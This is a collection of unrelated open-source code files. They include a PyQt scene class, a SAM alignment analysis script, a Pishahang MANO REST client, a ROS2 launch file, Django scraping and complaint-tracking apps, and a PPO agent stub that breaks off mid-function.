painter.setPen(sel_pen)
else:
painter.setPen(pen)
painter.drawLine(xc, 0, xc, scene_height)
for y in range(0, grid_vertical_count):
yc = y * self.grid_height
if y % 5 == 0:
painter.setPen(sel_pen)
else:
painter.setPen(pen)
painter.drawLine(0, yc, scene_width, yc)
def add_item(self, widget):
if not isinstance(widget, list):
widget = [widget]
for _w in widget:
self.add_items.append(_w)
self.addItem(_w)
_shadow = QtWidgets.QGraphicsDropShadowEffect(self)
_shadow.setBlurRadius(10)
_shadow.setOffset(3, 3)
_shadow.setColor(QtGui.QColor(10, 10, 10, 150))
_w.setGraphicsEffect(_shadow)
if hasattr(_w, 'set_movable_flag_from_scene'):
_w.set_movable_flag_from_scene()
if hasattr(_w, 'set_selectable_flag_from_scene'):
_w.set_selectable_flag_from_scene()
def remove_item(self, widget):
if not isinstance(widget, list):
widget = [widget]
for _w in widget:
self.add_items.remove(_w)
self.removeItem(_w)
def clear(self):
for _i in self.items():
self.remove_item(_i)
self.add_items = []
# -----------------------------------------------------------------------------
# EOF
# -----------------------------------------------------------------------------
| 2.171875 | 2 |
tools/scripts/sam-analysis.py | srirampc/ecet | 1 | 12766429 | <filename>tools/scripts/sam-analysis.py
#!/usr/bin/python
import sys
import argparse
import re
import alignment as an
import ecutils as eu
#
# File : sam-analyis.py
# Created on December 1, 2011
# Author : <NAME> <<EMAIL>>
#
# This file is part of Error Correction Review Toolkit.
# Error Correction Review Toolkit is free software: you can
# redistribute it and/or modify it under the terms of the GNU
# Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Error Correction Review Toolkit is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Libpnorm. If not, see <http://www.gnu.org/licenses/>.
#
charMapping = {'A':'0','C':'1','G':'2','T':'3','N':'4','-':'5',
'a':'0','c':'1','g':'2','t':'3','n':'4',
'Y':'6','R':'7',
'y':'6','r':'7'}
alphabet = eu.alphabet
error_types = [0,1,2]
complementMapping = eu.complementMapping
fgenome = { 0: None }
class SkipError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
# For the alignment build the error as a dictionary
# {
# pos : [ [true_base,wrong_base,type_of_error],...]
# ...
# }
def getErrorsFromAlignment(readString,refAlign,readAlign,flag):
l = len(refAlign)
readl = len(readString)
sofar = 0
errors = {}
revCompl = False
if flag & 16 == 16:
revCompl = True
for i in range(readl):
errors[i] = []
if revCompl:
refAlign = eu.reverse_complement(refAlign)
readAlign = eu.reverse_complement(readAlign)
#print refAlign
#print readAlign
for i in range(l):
tb = wb = '-'
errtype = -1
if readAlign[i] == '-' and refAlign[i] in alphabet:
errtype = 1 # deletion error (missing char in the read after pos)
elif refAlign[i] == '-' and readAlign[i] in alphabet:
errtype = 2 # insertion error (extra char in read at pos)
elif readAlign[i] != refAlign[i] and readAlign[i] in alphabet and refAlign[i] in alphabet:
errtype = 0 # substition error
if errtype in error_types:
tb = charMapping[refAlign[i]] # true base
wb = charMapping[readAlign[i]] # wrong base
errors[sofar] += [[tb,wb,errtype]] # error type
if readAlign[i] != '-':
sofar += 1
#print errors
return errors
def getErrors(readid,readString,cigarString,mdString,gpos,flag):
errors = { 'id':readid }
if mdString != None:
mdString = mdString.split(':')[-1]
#print readid,readString,cigarString, mdString
[refAlign,readAlign,sb,se] = an.getSAMAlignment(readString,cigarString,mdString,
fgenome[0],gpos)
errors = getErrorsFromAlignment(readString,refAlign,readAlign,flag)
return [errors,sb,se]
def countErrors(errors):
nerrs = 0
for pos in sorted(errors.keys()):
nerrs += len(errors[pos])
return nerrs
def writeErrors(outf,readid,errors):
errorStr = ''
count = 0
for pos in sorted(errors.keys()):
errlst = errors[pos]
for l in errlst:
errorStr += '\t' + str(pos)
count += 1
for x in l:
errorStr += '\t' + str(x)
if len(errorStr) > 0:
outf.write( readid + '\t' + str(count) + errorStr + '\n')
def processLine(line,outf,unmapf,ambf,trimf,dryRun):
sminf = eu.getSAMinfo(line)
nerrs = nunmap = nambig = nmapd = 0
skipl = unmapLength = ambigLength = mapLength = 0
readid = sminf['QNAME']
flag = sminf['FLAG']
mapqual = sminf['MAPQ']
cigarString = sminf['CIGAR']
gpos = sminf['POS']
#asString = sminf['AS']
#xtString = sminf['XT']
readString = sminf['SEQ']
readLen = len(readString)
if flag & 4 == 4: # 4 === aligned at multiple places
nunmap += 1; unmapLength += readLen
if unmapf: unmapf.write(readid+'\n')
elif mapqual == 0: # map quality is zero for unambiguous read
nambig += 1; ambigLength += readLen
if ambf: ambf.write(readid + '\n')
elif (cigarString != '*') and (mapqual != 0): #if read is uniqly aligned
mdstring = sminf['MD']
if mdstring == None and len(fgenome) == 0:
eu.eprint("NO MD STRING / GENOME AVAILABLE !!!")
assert mdstring != None
try:
[errors,sb,se] = getErrors(readid,readString,cigarString,mdstring,gpos,flag)
if errors:
nerrs += countErrors(errors)
if outf:
writeErrors(outf,readid,errors)
if sb + se != readLen:
if trimf:
trimf.write(readid + '\t' + str(se) + '\t' + str(sb) + '\n')
skipl += sb + readLen - se
mapLength = se - sb
nmapd += 1
else:
mapLength = readLen
nmapd += 1
except SkipError as err:
eu.eprint('SKIP ' + readid + ' ' + str(err))
if ambf: ambf.write(readid + '\n')
nambig += 1; ambigLength += readLen
else : # this is the case should not happen
eu.eprint(str(readid) + ' is ambigous ')
return (nerrs, skipl, nunmap, unmapLength, nambig, ambigLength, nmapd, mapLength)
def process(fileName,outFile,unmappedFile,ambigFile,genomeFile,trimFile,dryRun):
#print "Processing",fileName
global fgenome
if dryRun:
outFile = ambigFile = unmappedFile = ambigFile = trimFile = None
if genomeFile is not None: fgenome = eu.load_genome(genomeFile)
inf = outf = unmapf = ambf = trimf = None
terrs = tSkipLength = tMappedLength = 0
tmapd = tunmapped = tUnmapLength = tambig = tAmbigLen = 0
try:
if unmappedFile is not None: unmapf = open(unmappedFile, 'w')
if trimFile is not None: trimf = open(trimFile,'w')
if (unmappedFile != ambigFile) and (ambigFile is not None):
ambf = open(ambigFile, 'w')
if ambf is None: ambf = unmapf
if outFile is not None:
if outFile == "-":
outf = sys.stdout
else:
outf = open(outFile, 'w')
if fileName == "-":
inf = sys.stdin
else:
inf = open(fileName, 'r')
# eliminate first line
for line in inf:
if line[0] == '@': # skip header line
continue
try:
(nerr,skipl,nunmap,unmapl,
nambig,ambigl,nmap,maplen) = processLine(line,outf,unmapf,
ambf,trimf,dryRun)
terrs += nerr; tSkipLength += skipl
tunmapped += nunmap; tUnmapLength += unmapl
tambig += nambig; tAmbigLen += ambigl
tmapd += nmap; tMappedLength += maplen
except AssertionError, b:
eu.eprint(b)
eu.eprint(line)
except IOError, ioe:
eu.eprint("I/O Err " + str(ioe))
if outf is not None: outf.close()
if inf is not None: inf.close()
if unmapf is not None: unmapf.close()
if trimf is not None: trimf.close()
if unmappedFile != ambigFile and ambf is not None: ambf.close()
eu.eprint("------------------ SAM STATISTICS ------------------")
eu.eprint('No. of errors :{0:>11}'.format(terrs))
eu.eprint('No. unmapped Reads :{0:>11}'.format(tunmapped))
eu.eprint('No. mapped Reads :{0:>11}'.format(tmapd))
eu.eprint('No. ambig Reads :{0:>11}'.format(tambig))
eu.eprint('No. ambig + unmap :{0:>11}'.format(tambig + tunmapped))
eu.eprint('Total mapped length :{0:>11}'.format(tMappedLength))
eu.eprint('Total unmapped length :{0:>11}'.format(tUnmapLength))
eu.eprint('Total clipped length :{0:>11}'.format(tSkipLength))
eu.eprint('Total ambiguous length :{0:>11}'.format(tAmbigLen))
eu.eprint('Total ambig + unmap length :{0:>11}'.format(tAmbigLen + tUnmapLength))
eu.eprint("------------------ --------------- ------------------")
def verify(fileName,outfile,unmappedFile,ambigFile,genomeFile):
# TODO:
# Load Genome
# For each read in SAM file
pass
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("samFile",
help="/PATH/TO/INPUT-SAM-file (or) - (stdin)")
parser.add_argument("outputErrFile",
help="/PATH/TO/OUT-ERR-file (or) - (stdout)")
parser.add_argument("unmappedFile",
help="/PATH/TO/OUT-unmapped-file")
parser.add_argument("-a", "--ambig",
help="/PATH/TO/OUT-ambigous-file")
parser.add_argument("-t", "--trim",
help="/PATH/TO/OUT-trimmed-file")
parser.add_argument("-g", "--genome",
help="/PATH/TO/INPUT-genome-file")
parser.add_argument("-d", "--dry_run", action="store_true")
try:
args = parser.parse_args()
# opts,args = getopt.getopt(argv,"f:o:u:a:t:g:dvh",["file=","outfile=",
# "unmapped=", "ambig=",
# "trim=","genome=",
# "dry" "verify","help"])
except argparse.ArgumentError as err:
eu.eprint(str(err))
parser.print_help()
sys.exit(2)
# Get the command line arguments
trimFile = ambigFile = filename = outfile = unmappedFile = None
genomeFile = None
dryRun = verify = False
filename = args.samFile
outfile = args.outputErrFile
unmappedFile = args.unmappedFile
ambigFile = args.ambig
genomeFile = args.genome
trimFile = args.trim
dryRun = args.dry_run
eu.eprint("------------------ INPUT ARGUMENTS ------------------")
eu.eprint("IN SAM File (sorted) : ", filename)
eu.eprint("IN Ref Genome File : ", genomeFile)
eu.eprint("OUT Mapped Reads File : ", outfile)
eu.eprint("OUT Unmapped Reads File : ", unmappedFile)
eu.eprint("OUT Ambigous Reads File : ", ambigFile)
eu.eprint("OUT Trim File : ", trimFile)
eu.eprint("Y/N Dry Run : ", dryRun)
eu.eprint("------------------ --------------- ------------------")
if filename == None or outfile == None or unmappedFile == None:
parser.print_help()
sys.exit()
if verify:
if genomeFile == None:
parser.print_usage()
sys.exit()
#verify(filename,outfile,unmappedFile,ambigFile,genomeFile)
eu.eprint("--- VERIFY FUNCTION NOT IMPLEMENTED ---")
else:
# Process the file
process(filename,outfile,unmappedFile,ambigFile,
genomeFile,trimFile,dryRun)
if __name__ == "__main__":
main(sys.argv[1:])
| 2.296875 | 2 |
wrappers/SONATAClient/pishahang.py | CN-UPB/python-mano-wrappers | 0 | 12766430 | <filename>wrappers/SONATAClient/pishahang.py<gh_stars>0
import json
import requests
class Pishahang():
"""
Pishahang Related Interfaces
"""
def __init__(self, host, port=4002, requests_port=32001, policy_port=8899):
self._host = host
self._port = port
self.policy_port = policy_port
self._requests_port = requests_port
self._base_path = 'http://{0}:{1}'
self._user_endpoint = '{0}'
def get_csd_descriptors(self, token, offset=None, limit=None, host=None, port=None):
""" CSD Package Management Interface - Cloud descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
if not offset:
offset = 0
if not limit:
limit = 10
_endpoint = "{0}/catalogues/api/v2/csds?offset={1}&limit={2}".format(base_path, offset, limit)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token)}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_csd_descriptors(self, token, package_path, host=None, port=None):
""" CSD Package Management Interface - Cloud descriptors
/vnf_descriptors:
POST - Create a new individual
VNFpackage resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_csd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/csd_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/csds".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def get_pd_descriptors(self, offset=None, limit=None, host=None, port=None):
""" PD Management Interface - Policy descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
_endpoint = "{0}/policy_descriptor".format(base_path)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json"}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_pd_descriptors(self, package_path, host=None, port=None):
""" PD Policy descriptors
/policy_descriptors:
POST - Create a new individual
Policy resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_pd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/policy_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json"}
_endpoint = "{0}/policy_descriptor".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_pd_descriptors_pdpkgid(self, pdpkgid, host=None, port=None):
""" PD Management Interface -
Individual PD package
:param token: auth token retrieved by the auth call
:param csdpkgid: id of the vnf package to fetch
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json"}
_endpoint = "{0}/policy_descriptor".format(base_path)
_data = { "name": pdpkgid }
try:
r = requests.delete(_endpoint, data=json.dumps(_data), params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def get_cosd_descriptors(self, token, offset=None, limit=None, host=None, port=None):
""" COSD Package Management Interface - Cloud descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
if not offset:
offset = 0
if not limit:
limit = 10
_endpoint = "{0}/catalogues/api/v2/complex-services?offset={1}&limit={2}".format(base_path, offset, limit)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token)}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cosd_descriptors(self, token, package_path, host=None, port=None):
""" COSD Package Management Interface - Cloud descriptors
/vnf_descriptors:
POST - Create a new individual
VNFpackage resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_cosd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/csd_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/complex-services".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cs_instances_nsinstanceid_instantiate(self, token, nsInstanceId, egresses=[], ingresses=[], host=None, port=None):
""" NS (CS) Lifecycle Management Interface -
Instantiate CS task
:param token: auth token retrieved by the auth call
:param nsInstanceId: NS instaniation description
:param ingresses: ingresses list
:param egresses: egresses list
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_cosd_list = json.loads(sonata_pishahang.get_cosd_descriptors(token=_token["token"]["access_token"]))
_cosd_list = json.loads(_cosd_list["data"])
_ns = None
for _n in _cosd_list:
if "A dummy Example." == _n['nsd']['description']:
_ns = _n['uuid']
if _ns:
response = json.loads(
sonata_pishahang.post_cs_instances_nsinstanceid_instantiate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
"""
if host is None:
base_path = self._base_path.format(self._host, self._requests_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {
"Content-Type": "application/json",
"accept": "application/json",
"Authorization": 'Bearer {}'.format(token)}
data = {
"service_uuid": nsInstanceId,
"egresses" : egresses,
"ingresses" : ingresses
}
_endpoint = "{0}/api/v2/requests".format(base_path)
try:
r = requests.post(_endpoint, params=None, verify=False,
headers=headers, json=data)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cs_instances_nsinstanceid_terminate(self, token, nsInstanceId, host=None, port=None):
""" NS (CS) Lifecycle Management Interface -
Terminate CS task
:param token: auth token retrieved by the auth call
:param nsInstanceId: id of the NS instance
:param host: host url
:param port: port where the MANO API can be accessed
:param force: true/false whether to force terminate
"""
if host is None:
base_path = self._base_path.format(self._host, self._requests_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {
"Content-Type": "application/json",
"accept": "application/json",
"Authorization": 'Bearer {}'.format(token)}
data = {
"service_instance_uuid": nsInstanceId,
"request_type": "TERMINATE"
}
_endpoint = "{0}/api/v2/requests".format(base_path)
try:
r = requests.post(_endpoint, params=None, verify=False,
headers=headers, json=data)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_cosd_descriptors_cosdpkgid(self, token, cosdpkgid, host=None, port=None):
""" COSD Management Interface - Individual COSD Descriptor
:param token: auth token retrieved by the auth call
:param cosdpkgid: id of the individual NSD
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/complex-services/{1}".format(base_path, cosdpkgid)
try:
r = requests.delete(_endpoint, params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.no_content:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_csd_descriptors_csdpkgid(self, token, csdpkgid, host=None, port=None):
""" CSD Package Management Interface -
Individual CSD package
:param token: auth token retrieved by the auth call
:param csdpkgid: id of the vnf package to fetch
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", 'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/csds/{1}".format(base_path, csdpkgid)
try:
r = requests.delete(_endpoint, params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.no_content:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
| 2.5 | 2 |
utils/verify.py | sweeneyngo/swvgio | 0 | 12766431 | <filename>utils/verify.py<gh_stars>0
import requests
def grab(url, params=None):
try:
r = requests.get(url, params=params, stream=True)
except requests.exceptions.Timeout:
# Maybe set up for a retry, or continue in a retry loop
print("Timed out...")
except requests.exceptions.TooManyRedirects:
# Tell the user their URL was bad and try a different one
print("Invalid URL, check its validity first.")
except requests.exceptions.RequestException as e:
print("Unknown error, exiting immediately.")
raise SystemExit(e)
return r
| 3.09375 | 3 |
orca_driver/launch/pt2_launch.py | tsaoyu/orca2 | 0 | 12766432 | <reponame>tsaoyu/orca2
import os
import math
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
# Launch pool test #2
def generate_launch_description():
# Must match camera name in URDF file
camera_name = 'forward_camera'
camera_frame = 'forward_camera_frame'
orca_description_path = get_package_share_directory('orca_description')
urdf_path = os.path.join(orca_description_path, 'urdf', 'pt2.urdf')
orca_driver_path = get_package_share_directory('orca_driver')
map_path = os.path.join(orca_driver_path, 'maps', 'simple_map.yaml')
return LaunchDescription([
# Publish static joints
Node(package='robot_state_publisher', node_executable='robot_state_publisher', output='log',
arguments=[urdf_path]),
# Forward camera
Node(package='orca_driver', node_executable='opencv_camera_node', output='log',
node_name='opencv_camera_node', remappings=[
('image_raw', '/' + camera_name + '/image_raw'),
('camera_info', '/' + camera_name + '/camera_info'),
]),
# Driver
Node(package='orca_driver', node_executable='driver_node', output='log',
node_name='driver_node', parameters=[{
'voltage_multiplier': 5.05,
'thruster_4_reverse': True, # Thruster 4 ESC is programmed incorrectly
'tilt_channel': 6,
'voltage_min': 12.0
}]),
# AUV controller
Node(package='orca_base', node_executable='base_node', output='log',
node_name='base_node', parameters=[{
'auto_start': 5, # Auto-start mission >= 5
'auv_z_target': -0.5,
'auv_xy_distance': 2.0,
'auv_x_pid_kp': 0.0, # TODO
'auv_x_pid_ki': 0.0,
'auv_x_pid_kd': 0.0,
'auv_y_pid_kp': 0.0,
'auv_y_pid_ki': 0.0,
'auv_y_pid_kd': 0.0,
'auv_z_pid_kp': 0.0,
'auv_z_pid_ki': 0.0,
'auv_z_pid_kd': 0.0,
'auv_yaw_pid_kp': 0.0,
'auv_yaw_pid_ki': 0.0,
'auv_yaw_pid_kd': 0.0,
}], remappings=[
('filtered_odom', '/' + camera_name + '/base_odom')
]),
# Mapper
Node(package='fiducial_vlam', node_executable='vmap_node', output='log',
node_name='vmap_node', parameters=[{
'publish_tfs': 1,
'marker_length': 0.1778,
'marker_map_load_full_filename': map_path,
'make_not_use_map': 0,
# 'map_init_style': 1, # Init style 1: marker id and location is specified below:
# 'map_init_id': 0,
# 'map_init_pose_x': 0.0,
# 'map_init_pose_y': 0.0,
# 'map_init_pose_z': -0.5,
# 'map_init_pose_roll': math.pi / 2,
# 'map_init_pose_pitch': 0.0,
# 'map_init_pose_yaw': -math.pi / 2,
}]),
# Localizer
Node(package='fiducial_vlam', node_executable='vloc_node', output='log',
node_name='vloc_node', node_namespace=camera_name, parameters=[{
'publish_tfs': 1,
'publish_camera_pose': 0,
'publish_base_pose': 0,
'publish_camera_odom': 0,
'publish_base_odom': 1,
'publish_image_marked': 0,
'stamp_msgs_with_current_time': 0, # Use incoming message time, not now()
'camera_frame_id': camera_frame,
't_camera_base_x': 0.,
't_camera_base_y': 0.063,
't_camera_base_z': -0.16,
't_camera_base_roll': 0.,
't_camera_base_pitch': -math.pi / 2,
't_camera_base_yaw': math.pi / 2
}]),
])
| 2.46875 | 2 |
back/apps/spiders/models.py | Andrey-Omelyanuk/project-template | 0 | 12766433 | from celery import chain
from django.db.models import Model, CASCADE, ForeignKey, CharField, TextField, DateTimeField, BooleanField, IntegerField, JSONField
from django.db.models.signals import post_save
from django.dispatch import receiver
from .tasks.run_spider import run_spider
from .tasks.load_data_to_db import load_data_to_db
class Spider(Model):
name = CharField (max_length=128, unique=True, help_text='use spider from apps/spiders/spiders/<name>.py')
desc = TextField (default='')
def __str__(self):
return f"{self.name}"
class Session(Model):
spider = ForeignKey (Spider, on_delete=CASCADE)
started = DateTimeField (auto_now_add=True)
finished = DateTimeField (blank=True, null=True)
load_started = DateTimeField (blank=True, null=True)
load_finished = DateTimeField (blank=True, null=True)
def __str__(self):
return f"{self.spider.name} {self.started} - {self.finished}"
@receiver(post_save, sender=Session)
def run_spider_if_session_was_created(sender, instance, created, **kwargs):
if (created):
run_spider.delay(instance.id)
# run_spider.apply_async(instance.id, link=load_data_to_db.s(instance.id))
(run_spider.s(instance.id) | load_data_to_db.s(instance.id)).apply_async()
class Site(Model):
url = CharField (max_length=256, unique=True)
desc = TextField (default='')
def __str__(self):
return self.url
class Page(Model):
site = ForeignKey (Site, on_delete=CASCADE)
url = CharField (max_length=512, unique=True, help_text='Url without domain. You can find domain in site.url .')
last_visit = DateTimeField ( help_text='When spider was on the page in last time.')
def __str__(self):
return "%s%s"%(self.site.url, self.url)
class Article(Model):
site = ForeignKey (Site, on_delete=CASCADE)
idx = CharField (max_length=256, help_text='ID or Slug.')
last_updated= DateTimeField (help_text='Datetime from ArticleSnapshot.timestamp')
title = TextField (help_text='Title.')
body = TextField (help_text='Main text of article')
publish_date= DateTimeField (blank=True, null=True, help_text='')
class Meta:
unique_together = (("site", "idx"),)
class ArticleSnapshot(Model):
session = ForeignKey (Session, on_delete=CASCADE)
page = ForeignKey (Page , on_delete=CASCADE)
article = ForeignKey (Article, on_delete=CASCADE)
timestamp = DateTimeField ( help_text='Datetime when data was read from page.')
title = CharField (default='', blank=True, max_length=256, help_text='Title.')
body = JSONField (default=dict, help_text='Desc that was scriped from page.')
publish_date= DateTimeField (blank=True, null=True, help_text='')
class Meta:
unique_together = (("session", "page", "article"),)
| 2.21875 | 2 |
complaint/views.py | kodi-sk/CSI-WIP | 0 | 12766434 | <gh_stars>0
from django.shortcuts import render, redirect
from django.http import Http404, HttpResponse
from django import forms
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.shortcuts import render
from complaint.models import Complaint
from django.contrib.auth.decorators import login_required
def index(request):
all_complaint=Complaint.objects.all()
context = {'all_complaint' : all_complaint}
return render(request,'complaint/print.html',context)
@login_required(login_url="/")
def resolved(request,cid):
cid=int(cid)
remove=Complaint.objects.get(id=cid)
remove.resolved=True
remove.save()
html=remove.resolved
return redirect(show_complaints)
@login_required(login_url="/")
def detail(request, cid):
data = Complaint.objects.get(pk = cid)
context = {'complaint': data}
return render(request,'complaint/complaint.html',context)
@login_required(login_url="/")
def show_complaints(request):
#if user.is_authenticated()
all_complaint=Complaint.objects.all()
return render(request,'prints.html',{'complaints' : all_complaint})
@login_required(login_url="/")
def reject(request,get_id):
get_id=int(get_id)
remove=Complaint.objects.get(id=get_id)
remove.validity=False
remove.save()
html=remove.validity
return redirect(show_complaints)
def signup(request):
if request.method == "POST":
name = request.POST.get('user', None)
email = request.POST.get('email', None)
password = request.POST.get('password', None)
user1=User()
user1.username=name
user1.email=email
user1.set_password(password)
user1.save()
return redirect(show_complaints)
else:
return render(request, 'registration/register.html')
| 2.078125 | 2 |
dashboard_app/tests/models_tests.py | bitlabstudio/django-dashboard-app | 10 | 12766435 | """Tests for the models of the ``django-metrics-dashboard`` app."""
from django.test import TestCase
from .. import models
from .factories import DashboardWidgetSettingsFactory
class DashboardWidgetLastUpdateTestCase(TestCase):
"""Tests for the ``DashboardWidgetLastUpdate`` model class."""
longMessage = True
def test_model(self):
instance = models.DashboardWidgetLastUpdate()
instance.save()
self.assertTrue(instance.pk)
class DashboardWidgetSettingsTestCase(TestCase):
"""Tests for the ``DashboardWidgetSettings`` model class."""
longMessage = True
def test_model(self):
instance = DashboardWidgetSettingsFactory()
self.assertTrue(instance.pk)
| 2.375 | 2 |
geo_knowledge_hub/modules/frontpage/webpack.py | geo-knowledge-hub/geo-knowledge-hub | 12 | 12766436 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2021 GEO Secretariat.
#
# geo-knowledge-hub is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
from invenio_assets.webpack import WebpackThemeBundle
theme = WebpackThemeBundle(
__name__,
"theme/assets",
default="semantic-ui",
themes={
"semantic-ui": dict(
entry={
"geo-knowledge-hub-frontpage-theme": "./less/geo_knowledge_hub/frontpage/theme.less"
},
dependencies={
}
)
}
)
| 1.273438 | 1 |
policy/rl_policy.py | yangmuzhi/wuziqi | 0 | 12766437 | """
ppo rl algo
"""
from .algo.ppo import PPO
from tqdm import tqdm
class ppo_agent(object):
def __init__(self, dims_obs, dim_act, policy_fn, value_fn, size, ):
self.ppo = PPO(rnd=0,dim_obs=None, dim_act=None,
policy_fn=None, value_fn=None,
discount=0.99, gae=0.95, clip_ratio=0.2,
train_epoch=40, policy_lr=1e-3, value_lr=1e-3,
save_path="./log", log_freq=10, save_model_freq=100)
self.size = size
def reset(self):
self.actions = set(list(range(self.size**2)))
self.actions_ind = [True] * (self.size**2)
def get_action(self, obs, forbidden_actions):
"""
sample action
"""
action = self.actions
self.actions.difference_update(set(forbidden_actions))
diff = action.difference(self.actions)
